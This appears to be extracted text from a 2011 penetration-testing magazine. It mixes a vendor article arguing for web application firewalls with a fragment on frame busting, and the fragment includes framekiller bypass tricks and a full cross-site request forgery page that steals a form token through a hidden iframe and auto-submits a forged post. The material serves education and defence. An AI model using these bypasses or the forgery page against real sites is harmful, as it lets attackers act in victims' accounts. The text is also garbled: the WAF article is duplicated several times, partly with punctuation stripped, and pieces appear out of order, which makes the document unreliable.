The user interface is also an especially critical point, because it is the basis for safe WAF configuration. Unintelligible or poorly structured user interfaces lead to incorrect settings, which cancel out the protective functions. If, by contrast, the functions can be grasped intuitively and are clearly displayed, easy to understand and easy to set, then in practice this makes the greatest contribution to system security. A further plus is a user interface which is identical across several of the manufacturer's products or, even better, a management center which administrators can use to manage numerous other network and security products as well as the WAF. The administrators can then rely on known settings processes for security clusters. This ensures that security configurations for each cluster are consistent across the organization. An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account in the evaluation, along with the consistency of security deployment across applications and sites.
In summary, any web application, old or new, needs to be secured by a WAF in Full Proxy Mode. Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place. They should also check whether it prevents the hacking of the application itself with common or new means, whether it secures all the backend systems the application connects to, and whether it stops leakage of sensitive data when the web application has weaknesses which the WAF cannot level out. If penetration testers are not only looking for a security snapshot but want to help their customers create sustainable security, they should always include the WAF's administration in their assessment.
OLIVER WAI
Oliver Wai leads product marketing for Barracuda's Web application security and application delivery product lines. In this role, Oliver is a core member of Barracuda's security incident response team and writes frequently about the latest application security threats. Prior to Barracuda Networks, Oliver held positions at Google, Integration Appliance and Brocade Communications. Oliver has an MS in Management Science & Engineering from Stanford University and a BS (Cum Laude) in Computer Engineering from Santa Clara University.
In the upcoming issue of PenTest magazine:

• Web Session Management
• Password management in code
• ETHical Ghosts on SF1
• Preservation, namely in the online gambling industry
• Cyber Security War

Available to download on December 22nd.

If you would like to contact the PenTest team, just send an email to en@pentestmag.com. We will reply as soon as possible.
WEB APP VULNERABILITIES
Page 36 httppentestmagcom012011 (1) November
And common counter-action statements are these
toplocation = selflocation
toplocationhref = documentlocationhref
toplocationreplace(selflocation)
toplocationhref = windowlocationhref
toplocationreplace(documentlocation)
toplocationhref = windowlocationhref
toplocationhref = bdquoURLrdquo
documentwrite(lsquorsquo)
toplocationreplace(documentlocation)
toplocationreplace(lsquoURLrsquo)
toplocationreplace(windowlocationhref)
toplocationhref = locationhref
selfparentlocation = documentlocation
parentlocationhref = selfdocumentlocation
Different FrameKillers are used by web developers, and different techniques are used to bypass them.
Method 1:

<script>
window.onbeforeunload = function() {
    return "Do you want to leave this page?";
}
</script>
<iframe src="http://www.good.com"></iframe>
Method 2: Using double framing

<iframe src="second.html"></iframe>

second.html:
<iframe src="http://www.site.com"></iframe>
Best Practices
And the best example of a FrameKiller is the following:

<style> html { display: none; } </style>
<script>
if (self == top) {
    document.documentElement.style.display = 'block';
} else {
    top.location = self.location;
}
</script>
This protects the web application even if an attacker opens the page in a browser with JavaScript disabled: the content then simply stays hidden.
SAMVEL GEVORGYAN
Founder & Managing Director, CYBER GATES
www.cybergates.am | samvelgevorgyan@cybergates.am
Samvel Gevorgyan is Founder and Managing Director of CYBER GATES, an information security consulting, testing and research company, and has over 5 years of experience working in the IT industry. He started his career as a web designer in 2006 and then began studying web programming and web security concepts in earnest, which allowed him to gain deeper knowledge of web design, web programming techniques and information security. All this experience shaped Samvel's work ethic: he pays attention to each line of code, both for good optimization and for protection against different kinds of malicious attacks such as XSS (Cross-Site Scripting), SQL Injection and CSRF (Cross-Site Request Forgery). In this way Samvel has taken his work to a higher level and is gradually becoming a more complete security professional.
References
• Cross-Site Request Forgery – http://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29, http://projects.webappsec.org/w/page/13246919/Cross-Site-Request-Forgery
• Same Origin Policy
• FrameKiller (Frame Busting) – http://en.wikipedia.org/wiki/Framekiller, http://seclab.stanford.edu/websec/framebusting/framebust.pdf
Listing 4. Real scenario of the attack

<html>
<head>
<title>BAD.COM</title>
<script>
function submitForm() {
    var token = window.frames[0].document.forms["messageForm"].elements["token"].value;
    var myForm = document.myForm;
    myForm.token.value = token;
    myForm.submit();
}
</script>
</head>
<body onLoad="submitForm()">
<div style="display:none">
<iframe src="http://good.com/index.php"></iframe>
<form name="myForm" target="hidden" action="http://good.com/post.php" method="POST">
<input type="text" name="message" value="I like www.bad.com" />
<input type="hidden" name="token" value="" />
<input type="submit" value="Post" />
</form>
</div>
</body>
</html>
WEB APPLICATION CHECKING
Pages 38-39, http://pentestmag.com, 01/2011 (1) November
Web applications are currently being used by hackers on a grand scale as gateways into corporate networks. Web Application Firewalls (WAFs) make it a lot more difficult to penetrate networks.

In most commercial and non-commercial areas, the internet has developed into an indispensable medium that offers users a huge number of interesting and important applications. Information procurement of any kind, buying services or products, but also bank transactions and virtual official errands can be conducted easily and comfortably from the screen. Waiting times are a thing of the past, and while we used to have to search laboriously for information, search engines now deliver results in a matter of seconds. Browsers and the web thus dominate the majority of daily procedures in both our private and our working lives. To facilitate all of these processes, a broad range of applications is required, provided more or less publicly. Their range extends from simple applications for searching for product information or filling in forms up to complex systems for auctions, product orders, internet banking or processing quotations. They even control access to the company's own intranet.
A major reason for these rapid developments is the almost unlimited possibility to simplify and accelerate business processes and make them more productive. Most enterprises and public authorities also see the web as an opportunity to make enormous cost savings, benefit from additional competitive advantages and open up new business opportunities. This requires a growing number of increasingly powerful applications that provide the internet user with the required functions as quickly and simply as possible.
Developers of such software programs are under enormous cost and time pressure. An increasing number of companies want to use the functionality of these so-called web applications for their business processes and offer their products, services and information as quickly, simply and in as many ways as possible. Guidelines for secure programming and release processes are therefore usually either not available or not heeded. In the end this results in programming errors, because major security aspects are deliberately disregarded or simply forgotten. Productive use usually follows soon after development, without the developers having sufficiently checked the security status of the web applications.
Above all, the common practice of adapting tried and tested technologies for developing web applications without subjecting them to prior security and qualification tests is dangerous. Believing that the existing network firewall will provide the required protection should weaknesses become apparent, those responsible unwittingly grant access to systems within the corporate boundaries. And thereby
First the Security Gate, then the Airplane
What needs to be heeded when checking web applications

Anyone developing a new software program will usually have an idea of the features and functions that the program should master. The subject of security is, however, often an afterthought. But with web applications the backlash comes quickly, because many are accessible to everyone worldwide.
professional software engineering was not necessarily at the top of the agenda. So web applications usually went into productive operation without any clear security standards; their security standard was based solely on how the individual developers rated this aspect and how much they knew about it.
The problem with more recent web applications: many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate interaction in the first place or to make it dynamic; these include, for example, Ajax and JavaScript. While the browser was originally only a passive tool for viewing web sites, it has now evolved into an autonomous, active element and has actually become a kind of operating system for the plug-ins and add-ons. But that makes the browser and its tools vulnerable. Attackers gain access to the browser via infected web applications, and through it to further systems and to their owners' or users' sensitive data.
Some assume that an unsecured web application cannot cause any damage as long as it does not perform any security-relevant functions or hold any sensitive data. This is completely wrong; the opposite is the case. One single unsecured web application endangers the security of the downstream systems behind it, such as application or database servers. Equally wrong is the common misconception that the telecom providers' security services would protect the data. Providers are not responsible for the safe use of web applications, regardless of where they are hosted. Suppliers and operators of web applications are the ones who bear the big responsibility here towards all those who use their applications, one which they often do not fulfill.
they disclose sensitive data and make processes vulnerable. But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications.
As a result, critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible on the web. Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here. Particularly in association with the web, the security requirements for applications have a different focus and are much higher than for traditional network security. The requirements on service providers who conduct security checks on business-critical systems with penetration tests should be correspondingly higher.
While most companies have in the meantime protected their networks to a relatively high standard, the hackers have long since moved on to a different playing field: they now take advantage of security loopholes in web applications. There are several reasons for this. Compared with the network level, you don't need to be highly skilled to use the internet. This not only makes legitimate use easier, but also encourages the malicious misuse of web applications. In addition, the internet offers many possibilities for concealment and anonymity. As a result, the risk for attackers remains relatively low, and so does the inhibition threshold for hackers.
Many web applications that are still active today were developed at a time when awareness of application security on the internet had not yet been raised. There were hardly any threat scenarios, because the attackers' focus was directed at the internal IT structure of the companies. In the first years of web usage in particular,
Figure 1. This model (based on Everett M. Rogers' adoption curve from "Diffusion of Innovations") shows a time lag between the adoption of a new technology and the securing of that technology; both exhibit a similar technology adoption lifecycle. There is an inflection point when a technology becomes widely enough accepted, and therefore economically relevant for hackers, resulting in a period of peak vulnerability. Bottom line: security is an afterthought.
Web Applications Under Fire
The security issues of web applications have not escaped the attackers, and they have been exploiting these shortcomings in IT environments for some time now. There are numerous attack scenarios with which they can obtain access to corporate data and processes, or even external systems, via web applications. For years now the major types have been:
• All injection attacks (such as SQL Injection, Command Injection, LDAP Injection, Script Injection, XPath Injection)
• Cross-Site Scripting (XSS)
• Hidden Field Tampering
• Parameter Tampering
• Cookie Poisoning
• Buffer Overflow
• Forceful Browsing
• Unauthorized access to web servers
• Search Engine Poisoning
• Social Engineering
The only more recent trend: attackers have started to combine these methods more often in order to achieve even higher success rates. And it is no longer just the large corporations who are targeted, because they usually guard and conceal their systems better; instead, an increasing number of smaller companies are now in the crossfire.
One Example
Attackers know that a certain commercial software program is widely used for shopping carts in online shops, and that the smaller companies rarely patch its weak points. They launch automated attacks in order to identify, with high efficiency, as many worthwhile targets as possible on the web. In this step they already gather the required data about the underlying software, the operating system or the database from web applications that give away information freely. The attackers then only have to evaluate this information, giving them an extensive basis for later targeted attacks.
How to Make a Web Application Secure
There are two ways of actually securing the data and processes that are connected to web applications. The first would be to program each application absolutely error-free, under the required application conditions and security aspects, according to predefined guidelines. Companies would also have to raise the security of older web applications to the required standards retroactively.
However, this intention is generally doomed to failure from the outset, because the later integration of security functions into an existing application is in most cases not only difficult but above all expensive. For example, a program that has so far not processed its inputs and outputs via centralized interfaces is to be enhanced so that the data can be checked. It is then not sufficient to just add new functions; the developers must start by precisely analyzing the program and then make deep inroads into its basic structures. This is not only tedious but also harbors the danger of introducing new mistakes. Another example is programs that do not just use the session attributes for authentication. In this case it is not straightforward to update the session ID after logging in, which makes the application susceptible to session fixation.
If existing web applications display weak spots, and the probability is relatively high, then it should be clarified whether it makes business sense to correct them. It should not be forgotten here that other systems are put at risk by the unsecured application. A risk analysis can clarify whether and to what extent the problems must be resolved, or whether further measures should be taken at the same time. Often, however, the original developers are no longer available, and training new developers as well as analyzing the web application results in additional costs.
The situation is not much better with web applications that are developed from scratch. No software program has ever gone into productive operation free of errors or weak spots; the shortcomings are frequently uncovered only over time. And by this time, correcting the errors is once again time-consuming and expensive. In addition, the application cannot be deactivated during this period if it works as a sales driver or supports an important business process. Despite this, the demand for good code that sensibly combines effectiveness, functionality and security still has top priority: the more safely a web application is written, the less improvement work is needed and the less complex the external security measures that have to be adopted.
The second approach, in addition to secure programming, is the general safeguarding of web applications with a special security system from the time they go into operation. Such security systems are called Web Application Firewalls (WAFs) and safeguard the operation of web applications.
A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP). As such, it represents a special case of Application-Level Firewalls (ALF) or Application-Level Gateways (ALG). In contrast with classic firewalls and Intrusion Detection
Systems (IDS), a WAF checks the communication at the application level. Normally, the web application to be protected does not have to be changed.
Secure programming and WAFs are not contradictory but actually complement each other. By analogy with air traffic, it is without doubt important that the airplane (the application itself) is well serviced and safe. But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall), which, as the first security layer, considerably minimizes the risks of attacks on any weak spots.
After introducing a WAF, it is still advisable to have the security functions checked by penetration testers. This might reveal, for example, that the system can be misused via SQL injection by entering inverted commas. It would be a costly procedure to correct this error in the web application; if a WAF is deployed as a protective system, it can instead be configured to filter the inverted commas out of the data traffic. This simple example shows at the same time that it is not sufficient to just position a WAF in front of the web application without an analysis; this would lead to misjudging the achieved security status. Filtering out special characters does not always prevent an attack based on the SQL injection principle. Additionally, the system performance would suffer, as the security rules would have to be set as restrictively as possible in order to exclude all possible threats. In this context too, penetration tests make an important contribution to increasing web application security.
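To make the inverted-comma example concrete: a rule that merely strips single quotes defeats quote-based probes but cannot touch injections that need no quote at all, such as those in a numeric context. This is an illustrative sketch, not any real WAF's rule syntax.

```javascript
// Naive WAF rule: drop single quotes (inverted commas) from parameter values.
function stripQuotes(value) {
  return value.replace(/'/g, '');
}

const quoteProbe = "' OR '1'='1";  // classic quote-based probe: mangled by the filter
const numericProbe = '1 OR 1=1';   // numeric-context injection: no quote to strip

console.log(stripQuotes(quoteProbe));   // payload is broken up
console.log(stripQuotes(numericProbe)); // passes through unchanged
```

This is why the text insists on analysis before deployment: a character filter addresses one symptom, not the injection principle itself.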
WAF Functionality
A major advantage of WAFs is that one single system can close the security loopholes of several web applications. If they are run in redundant mode, they can also perform load-balancing functions in order to distribute data traffic better and increase performance for the web applications. With content-caching functions they reduce the load on the backend web servers, and via automated compression procedures they reduce the bandwidth requirements of the client browser.
In order to protect the web applications, WAFs filter the data flow between the browser and the web application. If an entry pattern emerges that is defined as invalid, the WAF interrupts the data transfer or reacts in another way predefined in its configuration. If, for example, two parameters have been defined for a monitored entry form, then the WAF can block all requests that contain three or more parameters. In the same way, the length and contents of parameters can be checked. Many attacks can be prevented, or at least made more difficult, just by specifying general rules about parameter quality, such as the maximum length, the valid number of characters and the permitted value range.
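Rules of the kind described, on parameter count, length and permitted characters, might be sketched as follows; the rule format and field names are invented for illustration, not any vendor's syntax.

```javascript
// One rule per form: maximum parameter count, plus per-field
// length limits and allowed character classes.
const formRule = {
  maxParams: 2,
  fields: {
    user:    { maxLen: 32,  allowed: /^[A-Za-z0-9_]+$/ },
    comment: { maxLen: 256, allowed: /^[\w\s.,!?-]*$/ },
  },
};

function checkRequest(params, rule) {
  const names = Object.keys(params);
  if (names.length > rule.maxParams) return false;   // too many parameters
  for (const name of names) {
    const field = rule.fields[name];
    if (!field) return false;                        // unknown parameter
    const value = params[name];
    if (value.length > field.maxLen) return false;   // over length limit
    if (!field.allowed.test(value)) return false;    // illegal characters
  }
  return true;
}
```

Even such coarse rules block the three-parameter request from the example above and reject values containing characters the form never needs.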
Of course, an integrated XML firewall should also be standard these days, because more and more web applications are based on XML code. This protects the web server from typical XML attacks such as nested elements or WSDL poisoning. A fully developed rule for access numbers with finely adjustable guidelines also eliminates the negative consequences of Denial of Service or brute-force attacks. However, every file that is uploaded to the web application can represent a danger if it contains a virus, worm, Trojan or similar; a virus scanner integrated into the WAF checks every file before it is passed to the web application.
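The finely adjustable guidelines for access numbers mentioned above amount to rate limiting. A minimal fixed-window counter per client, purely illustrative of the idea rather than of any product's implementation:

```javascript
// Allow at most `limit` requests per client within each `windowMs` window.
function makeRateLimiter(limit, windowMs) {
  const counters = new Map(); // clientId -> { count, windowStart }
  return function allow(clientId, now = Date.now()) {
    const entry = counters.get(clientId);
    if (!entry || now - entry.windowStart >= windowMs) {
      counters.set(clientId, { count: 1, windowStart: now }); // new window
      return true;
    }
    entry.count += 1;
    return entry.count <= limit;
  };
}
```

Tightening `limit` on a login URL blunts brute-force attempts; tightening it globally mitigates simple Denial of Service floods.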
Figure 2. An overview of how a Web Application Firewall works.
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn its nature. In this way these filters can, to a certain extent, automatically prevent malicious code from reaching the browser if, for example, a web application does not check the original data sufficiently. Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters. In practice, however, a whitelist-only approach is quite cumbersome, requiring constant re-learning whenever the application changes; such approaches quickly become outdated due to the constant tuning required to maintain the whitelist profiles. The contrary blacklist-only approach, on the other hand, offers attackers too many loopholes. Consequently, the ideal solution relies on a combination of whitelisting and blacklisting. This can be made easy to use with templated negative security profiles (e.g. for standard usages like Outlook Web Access, SharePoint or Oracle applications), augmented by a whitelist for a high-value sub-section like an order entry page.
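The combined approach just described can be sketched as a two-stage check: a blacklist of known attack patterns applied everywhere, plus a whitelist profile enforced only on a high-value sub-section. The patterns and the profile below are invented for illustration.

```javascript
// Stage 1: blacklist of known-bad patterns, applied to every request.
const blacklist = [/<script/i, /\bunion\s+select\b/i, /\.\.\//];

// Stage 2: learned whitelist profile, enforced only on high-value paths.
const whitelist = {
  '/order': { params: ['item', 'qty'], pattern: /^[A-Za-z0-9]+$/ },
};

function inspect(path, params) {
  // Any known attack pattern blocks the request outright.
  for (const value of Object.values(params)) {
    if (blacklist.some((re) => re.test(value))) return 'block';
  }
  // High-value paths must additionally match their whitelist profile.
  const profile = whitelist[path];
  if (profile) {
    for (const [name, value] of Object.entries(params)) {
      if (!profile.params.includes(name)) return 'block';
      if (!profile.pattern.test(value)) return 'block';
    }
  }
  return 'allow';
}
```

Ordinary pages only pay the cheap blacklist cost, while the order page gets the strict positive model, which is the division of labor the text recommends.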
To prevent a high number of false positives, some manufacturers provide an exception profiler. It flags to the administrator entries that violate the policies but can, based on an extensive heuristic analysis, still be categorized as legitimate. At the same time, the exception profiler suggests exemption clauses that prevent a similar false positive from recurring.
Some WAFs provide different operating modes: Bridge Mode (as Bridge Path) or Proxy Mode (as One-Arm Proxy or Full Reverse Proxy). In Bridge Mode the WAF is used as an in-line bridge path and works with the same address for the virtual IP and the backend server. Although this configuration avoids changes to the existing network structure, and as such can be integrated very easily and quickly to protect an endangered web application, Bridge Mode deployments sacrifice security and application acceleration for network simplicity. Additionally, this mode means that all data is passed on to the web application, including potential attacks, even if the security checks have been conducted.
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration, as it sits in-line and uses both of the system's physical ports (WAN and LAN). As a proxy, a WAF has the capability to protect web applications against attacks such as session spoofing or Cross-Site Request Forgery, which is not possible in Bridge Mode, and some special functions are only available here. As a Full Reverse Proxy, a WAF provides, for example, Instant SSL, which converts HTTP pages into HTTPS without changes to the code.
Proxy WAFs also provide a whole range of further security functions. They facilitate the translation of web addresses, i.e. the rewriting of URLs used by public requests into the web application's hidden URL, which means that the application's actual web address remains cloaked. With proxy WAFs, SSL is much faster, and the response times of the web application can also be accelerated. They also facilitate cloaking techniques, Layer 7 rules (to fend off Denial of Service attacks), as well as authentication and authorization. Cloaking, the concealment of one's
Figure 3. A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult.
own IT infrastructure, is the best way to evade the previously mentioned scan attacks with which attackers seek out easy prey. Masking outgoing data protects against data theft, and cookie security prevents identity theft. But proxy WAFs, too, must be configured to match the respective conditions; penetration tests help with the correct configuration.
Demands on Penetration Testers
When penetration testers look for weak spots, they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 2.0. This defines rules for distributing and storing Primary Account Number (PAN) information. Companies are required to develop secure web applications and maintain them constantly. Further points define formal risk checks and test processes intended to uncover high-risk weak spots. In order to check whether systems comply with PCI DSS, penetration testers must heed the following requirements:
• Does the system have a Web Application Firewall?
• Does the web traffic pass through a WAF proxy function?
• Are the web servers shielded against direct access by attackers?
• Is there simple SSL encryption for the data traffic, even if the application or the server does not support it?
• Are all known and unknown threats blocked?
A further point is protection against data theft. This involves checking whether the protection mechanism inspects the outgoing data traffic for the possible exfiltration of sensitive data and then stops it.
Penetration testers can fall back on web scanners to run security checks on web applications. Several WAFs provide extra interfaces to automate such tests.
Since, by its very nature, a WAF stands on the front line, certain test criteria should be applied to it as well. These include in particular identity and access management. Here the principle of least privilege applies: users are only awarded those privileges they need for their work or for the use of the web application; all other privileges are blocked. General integration of the WAF with Active Directory, eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier.
The user interface is also an especially critical point, because it is the basis for safe WAF configuration. Unintelligible or poorly structured user interfaces lead to incorrect settings, which cancel out the protective functions. If, by contrast, the functions can be grasped intuitively and are clearly displayed, easy to understand and easy to set, then in practice this makes the greatest contribution to system security. A further plus is a user interface which is identical across several of the manufacturer's products, or, even better, a management center which administrators can use to manage numerous other network and security products as well as the WAF. The administrators can then rely on familiar settings processes for security clusters. This ensures that security configurations for each cluster are consistent across the organization. An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account in the evaluation, along with the consistency of security deployment across applications and sites.
In summary, any web application, old or new, needs to be secured by a WAF in Full Proxy Mode. Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place. They should also check whether it prevents the hacking of the application itself with common or new means, whether it secures all the backend systems the application connects to, and whether it stops leakage of sensitive data when the web application has weaknesses which the WAF cannot level out. If penetration testers are not only looking for a security snapshot but want to help their customers create sustainable security, they should always include the WAF's administration in their assessment.
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
They are currently being used by hackers on a grand scale as gateways into corporate networks Web Application Firewalls (WAFs)
make it a lot more difficult to penetrate networksIn most commercial and non-commercial areas the
internet has developed into an indispensible medium that offers users a huge number of interesting and important applications Information procurement of any kind buying services or products but also bank transactions and virtual official errands can be conducted easily and comfortably from the screen Waiting times are a thing of the past and while we used to have to search laboriously for information we now have the search engines that deliver the results in a matter of seconds And so browsers and the web today dominate the majority of daily procedures in both our private as well as working lives In order to facilitate all of these processes a broad range of applications is required that are provided more or less publically Their range extends from simple applications for searching for product information or forms up to complex systems for auctions product orders internet banking or processing quotations They even control access to the companyrsquos own intranet
A major reason for these rapid developments is the almost unlimited possibilities to simplify accelerate and make business processes more productive Most enterprises and public authorities also see the web as
an opportunity to make enormous cost savings benefit from additional competitive advantages and open up new business opportunities This requires a growing number of ndash and more powerful ndash applications that provide the internet user with the required functions as fast and simply as possible
Developers of such software programs are under enormous cost and time pressure An increasing number of companies want to use the functionality of these so-called web applications for their business processes and offer their products services and information as quickly as possible simply and in a variety of ways So guidelines for safe programming and release processes are usually not available or they are not heeded In the end this results in programming errors because major security aspects are deliberately disregarded or are simply forgotten The productive use usually follows soon after development without developers having checked the security status of the web applications sufficiently
Above all the common practice of adapting tried and tested technologies for developing web applications is dangerous without having subjected them to prior security and qualification tests In the belief that the existing network firewall would provide the required protection if possible weaknesses were to become apparent those responsible unwittingly grant access to systems within the corporate boundaries And thereby
First the Security Gate then the AirplaneWhat needs to be heeded when checking web applications
Anyone developing a new software program will usually have an idea of the features and functions that the program should master The subject of security is however often an afterthought But with web applications the backlash comes quickly because many are accessible for everyone worldwide
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
professional software engineering was not necessarily at the top of the agenda So web applications usually went into productive operation without any clear security standards Their security standard was based solely on how the individual developers rated this aspect and how high their respective knowledge was
The problem with more recent web applications Many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place or to make it dynamic These include for example Ajax and JavaScript While the browser was originally only a passive tool for viewing web sites it has now evolved into an autonomous active element and has actually become a kind of operating system for the plug-ins and add-ons But that makes the browser and its tools vulnerable The attackers gain access to the browser via infected web applications and as such to further systems and to their ownersrsquo or usersrsquo sensitive data
Some assume that an unsecured web application cannot cause any damage as long as it does not perform any security-relevant functions or provide any sensitive data. This is completely wrong; the opposite is the case. A single unsecured web application endangers the security of the downstream systems behind it, such as application or database servers. Equally wrong is the common misconception that the telecom providers' security services would protect the data. Providers are not responsible for the safe use of web applications, regardless of where they are hosted. It is the suppliers and operators of web applications who bear the responsibility here, towards all those who use their applications, and it is a responsibility they often do not fulfill.
Those responsible thereby disclose sensitive data and make processes vulnerable. But conventional protection systems do not guard against the apparently legitimate connections that attackers establish via web applications.
As a result, critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible on the web. Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here. Particularly in connection with the web, the security requirements for applications have a different focus and are much higher than for traditional network security. The requirements on service providers who conduct security checks on business-critical systems with penetration tests should then also be correspondingly higher.
While most companies have in the meantime come to protect their networks to a relatively high standard, the hackers have long since moved on to a different playing field: they now take advantage of security loopholes in web applications. There are several reasons for this. Compared with the network level, you don't need to be highly skilled to use the internet. This not only makes legitimate use easier but also encourages the malicious misuse of web applications. In addition, the internet offers many possibilities for concealment and anonymity. As a result, the risk for attackers remains relatively low, and so does the inhibition threshold.
Many web applications that are still active today were developed at a time when awareness of application security on the internet had not yet been raised. There were hardly any threat scenarios, because the attackers' focus was directed at the internal IT structure of the companies.
Figure 1. This model (based on Everett M. Rogers' adoption curve from "Diffusion of Innovations") shows a time lag between the adoption of a new technology and the securing of that technology. Both exhibit a similar Technology Adoption Lifecycle. There is an inflection point when a technology becomes widely enough accepted, and therefore economically relevant for hackers, resulting in a period of Peak Vulnerability. Bottom line: security is an afterthought.
Web Applications Under Fire
The security issues of web applications have not escaped the attackers, and they have been exploiting these shortcomings in IT environments for some time now. There are numerous attack scenarios through which they can obtain access to corporate data and processes, or even external systems, via web applications. For years now the major types have been:
• All injection attacks (such as SQL Injection, Command Injection, LDAP Injection, Script Injection, XPath Injection)
• Cross-Site Scripting (XSS)
• Hidden Field Tampering
• Parameter Tampering
• Cookie Poisoning
• Buffer Overflow
• Forceful Browsing
• Unauthorized access to web servers
• Search Engine Poisoning
• Social Engineering
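To illustrate the first entry in the list, here is a minimal Python sketch of how SQL Injection works and how parameterized queries prevent it. The in-memory SQLite table and its contents are invented for this example:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")

def find_user_unsafe(name):
    # Vulnerable: attacker-controlled input is concatenated into the query.
    return conn.execute(
        "SELECT name FROM users WHERE name = '" + name + "'").fetchall()

def find_user_safe(name):
    # Parameterized: the driver treats the input strictly as data.
    return conn.execute(
        "SELECT name FROM users WHERE name = ?", (name,)).fetchall()

payload = "' OR '1'='1"
print(find_user_unsafe(payload))  # [('alice',)] - the injection matched every row
print(find_user_safe(payload))    # [] - no user has that literal name
```

The point is not the toy database but the contrast: the same payload that subverts the concatenated query is harmless as a bound parameter.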
The only more recent trend: attackers have lately started to combine these methods more often in order to achieve even higher success rates. And it is no longer just the large corporations who are targeted, since they usually guard and conceal their systems better. Instead, an increasing number of smaller companies are now in the crossfire.
One Example
Attackers know that a certain commercial software program is widely used for shopping carts in online shops, and that smaller companies rarely patch its weak points. They launch automated attacks in order to identify, with high efficiency, as many worthwhile targets as possible on the web. In this step they already gather the required data about the underlying software, the operating system or the database from web applications that give away such information freely. The attackers then only have to evaluate this information, giving them an extensive basis for later targeted attacks.
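The information gathering described above often relies on nothing more than reading the HTTP response headers that a talkative server volunteers. A minimal sketch of the filtering step; the header names and values below are illustrative, not taken from a real target:

```python
# Headers that commonly leak software and version details to scanners.
LEAKY_HEADERS = ("server", "x-powered-by", "x-aspnet-version")

def leaky(headers):
    """Return only the response headers that give away the software stack."""
    return {k: v for k, v in headers.items() if k.lower() in LEAKY_HEADERS}

# Example response headers from a talkative server (made up for illustration):
print(leaky({"Server": "Apache/2.2.3 (CentOS)",
             "X-Powered-By": "PHP/5.2.6",
             "Content-Type": "text/html"}))
# {'Server': 'Apache/2.2.3 (CentOS)', 'X-Powered-By': 'PHP/5.2.6'}
```

A WAF that suppresses or rewrites these headers (see the cloaking functions discussed later) denies the scanner exactly this input.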
How to Make a Web Application Secure
There are two ways of actually securing the data and processes that are connected to web applications. The first would be to program each application absolutely error-free, under the required application conditions and security aspects, according to predefined guidelines. Companies would also have to bring older web applications up to the required standards retroactively.
However, this intention is generally doomed to failure from the outset, because retrofitting security functions into an existing application is in most cases not only difficult but above all expensive. One example: a program that has so far not processed its inputs and outputs via centralized interfaces is to be enhanced so that the data can be checked. It is then not sufficient to just add new functions; the developers must start by precisely analyzing the program and then make deep inroads into its basic structures. This is not only tedious but also harbors the danger of introducing new mistakes. Another example is programs that do not use more than the session attributes for authentication. In this case it is not straightforward to renew the session ID after login, which leaves the application susceptible to Session Fixation.
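The Session Fixation problem mentioned above is countered by issuing a fresh session ID at the moment of login, so that any ID an attacker planted before authentication becomes worthless. A minimal sketch of that idea, with an invented in-memory session store:

```python
import secrets

sessions = {}  # session_id -> {"user": ..., "authenticated": bool}

def new_session():
    sid = secrets.token_hex(16)
    sessions[sid] = {"user": None, "authenticated": False}
    return sid

def login(old_sid, user):
    """Issue a fresh session ID on login so a fixated pre-login ID dies."""
    sessions.pop(old_sid, None)   # invalidate the pre-login session outright
    new_sid = new_session()
    sessions[new_sid].update(user=user, authenticated=True)
    return new_sid

sid = new_session()        # the ID an attacker might have planted ("fixated")
sid2 = login(sid, "alice")
assert sid != sid2 and sid not in sessions   # the planted ID is now useless
```

Real session frameworks expose this as a single call (e.g. a session-regeneration function); the sketch only shows why that call must happen at login.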
If existing web applications display weak spots, and the probability is relatively high, then it should be clarified whether it makes business sense to correct them. It should not be forgotten that other systems are put at risk by the unsecured application. A risk analysis can bring clarity as to whether, and to what extent, the problems must be resolved, or whether further measures should be taken at the same time. Often, however, the original developers are no longer available, and training new developers, as well as analyzing the web application, results in additional costs.
The situation is not much better with web applications that are developed from scratch. No software program has ever gone into productive operation free of errors or weak spots; the shortcomings are frequently uncovered only over time. And by then, correcting the errors is once again time-consuming and expensive. In addition, the application cannot be deactivated during this period if it works as a sales driver or supports an important business process. Despite this, the demand for good programming that sensibly combines effectiveness, functionality and security still has top priority: the more safely a web application is written, the less rework is needed and the less complex the external security measures that have to be adopted.
The second approach, in addition to secure programming, is the general safeguarding of web applications with a special security system from the time they go into operation. Such security systems are called Web Application Firewalls (WAFs) and safeguard the operation of web applications.
A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP). As such, it represents a special case of Application-Level Firewalls (ALF) or Application-Level Gateways (ALG). In contrast to classic firewalls and Intrusion Detection
Systems (IDS), a WAF checks communications at the application level. Normally, the web application to be protected does not have to be changed.
Secure programming and WAFs are not contradictory; they actually complement each other. By analogy with air traffic: it is without doubt important that the airplane (the application itself) is well serviced and safe. But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall), which, as the first security layer, considerably minimizes the risks of attacks on any weak spots.
